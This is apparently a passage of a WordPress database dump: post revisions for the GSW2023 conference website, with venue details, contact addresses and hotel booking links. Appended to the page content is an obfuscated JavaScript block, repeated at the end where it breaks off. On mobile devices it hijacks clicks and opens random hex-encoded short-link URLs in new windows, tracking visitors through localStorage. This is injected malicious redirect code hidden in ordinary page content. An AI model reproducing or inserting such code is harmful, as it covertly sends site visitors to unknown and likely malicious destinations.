main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-10 01:15:26','2023-07-10 01:15:26','',3066,'https://gsw2023.com/?p=4999',0,'revision','',0),
(5000,1,'2023-07-10 01:26:19','2023-07-10 01:26:19','<p>[vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5></h5>\n<h5>Deadline for the Special Rates is August 10, 2023</h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fsteigenberger-hotel-el-tahrir%2F\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"4788\" primary_title=\"Grand Nile Tower Hotel\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Grand Nile Tower Hotel\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.grandniletower.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fgrand-nile-tower-hotel%2F|title:Grand%20Nile%20Tower%20Hotel\"]</p>\n<ul>\n<li>https://www.grandniletower.com/</li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5></h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 